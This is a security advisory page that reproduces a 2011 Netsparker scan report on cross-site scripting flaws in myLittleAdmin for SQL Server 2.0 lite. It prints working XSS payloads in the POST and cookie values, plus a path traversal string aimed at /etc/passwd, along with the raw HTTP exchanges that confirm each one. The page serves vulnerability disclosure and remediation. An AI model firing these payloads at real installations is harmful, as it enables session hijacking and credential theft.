myLittleSQLAdmin V2.0 lite r.096 GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Comments - As of May 21, 2011, myLittleSQLAdmin V2.0 Lite r.096 is burned-in with VM's from SoftLayer on Windows 2008 R2 Server, 64 Bit. The current versions is Version 3.7 Release 0069 Build 3883 which has Reflected XSS.

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Exploit Store
Loading

Version Identification - mylittleadmin-for-sql-server-version-2.0-lite-r.096

XSS in mylittlesqladmin v2.0 lite r.096, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

Version Identification - mylittleadmin-for-sql-server-version-3.7-release-0069-build-3833 - The SKIN Cookie is Vuln to Reflected XSS

The value of the Skin cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload Expression was submitted in the Skin cookie. This input was echoed unmodified in the application's response.
XSS in mylittlesqladmin Version 3 Release 0069 Build 3833, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86
Netsparker - Scan Report Summary
TARGET URL
http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/...
SCAN DATE
5/21/2011 11:45:56 AM
REPORT DATE
5/22/2011 8:16:37 AM
SCAN DURATION
00:14:32

Total Requests

26978

Average Speed

30.91 req/sec.
19
identified
15
confirmed
0
critical
3
informational

GHDB DORK DATABASE

Scan Settings
PROFILE
Previous Settings
GHDB DORK TESTS
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

Vulnerable Application Summary

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
63 %
LOW
21 %
INFORMATION
16 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/mla2000/scripts/ Forbidden Resource Yes
/mla2000/scripts/conn/dsnless.asp Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
/mla2000/scripts/hlp/connected.asp mla_conn_datasource POST Cross-site Scripting Yes
mla_conn_dsn POST Cross-site Scripting Yes
mla_conn_password POST Cross-site Scripting Yes
mla_conn_user POST Cross-site Scripting Yes
mla_conn_networklibrary POST Cross-site Scripting Yes
mla_conn_portnumber POST Cross-site Scripting Yes
mla_conn_initialcatalog POST Cross-site Scripting No
Permanent Cross-site Scripting Yes
[Possible] Permanent Cross-site Scripting No
Cookie Not Marked As HttpOnly Yes
TRACE / TRACK Identified Yes
E-mail Address Disclosure No
IIS Version Disclosure No
/mla2000/scripts/pref/default.asp mla_cfg_theme POST Cross-site Scripting Yes
Permanent Cross-site Scripting Yes
mla_cfg_pagesize POST Internal Server Error Yes
Cross-site Scripting

Cross-site Scripting

8 TOTAL
IMPORTANT
CONFIRMED
7
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Parameters

Parameter Type Value
refresh GET 1
mla_conn_datasource POST </a style=x:expre/**/ssion(alert(0x0003E5))>

Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=%3C%2Fa+style%3Dx%3Aexpre%2F%2A%2A%2Fssion%28netsparker%280x0003E5%29%29%3E&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GGHDKDPDJGDBNDNCELJMJFEF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:02 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:02 GMT
Content-Length: 1632


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=</a style=x:expre/**/ssion(netsparker(0x0003E5))>;Address=</a style=x:expre/**/ssion(netsparker(0x0003E5))>,3;Network =3;Database=3;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Parameters

Parameter Type Value
refresh GET 1
mla_conn_dsn POST '"--></style></script><script>alert(0x000410)</script>

Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsn.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000410%29%3C%2Fscript%3E; ASPSESSIONIDQATCTSCC=GJHDKDPDALCMCCMPALHFACAM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:55 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:55 GMT
Content-Length: 1570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
dsn='"--></style></script><script>netsparker(0x000410)</script>;uid=3;pwd=3
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Parameters

Parameter Type Value
refresh GET 1
mla_conn_password POST '"--></style></script><script>alert(0x000411)</script>

Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsn.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000411%29%3C%2Fscript%3E&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GJHDKDPDALCMCCMPALHFACAM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:57 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:57 GMT
Content-Length: 1568


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
dsn=3;uid=3;pwd='"--></style></script><script>netsparker(0x000411)</script>
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Parameters

Parameter Type Value
refresh GET 1
mla_conn_user POST <script>ns(0x00043A)</script>

Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsn.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=%3Cscript%3Ens%280x00043A%29%3C%2Fscript%3E&Dsn=3; ASPSESSIONIDQATCTSCC=GJHDKDPDALCMCCMPALHFACAM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:48:18 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:48:18 GMT
Content-Length: 1554


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
dsn=3;uid=<script>ns(0x00043A)</script>;pwd=3
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
- /mla2000/scripts/hlp/connected.asp

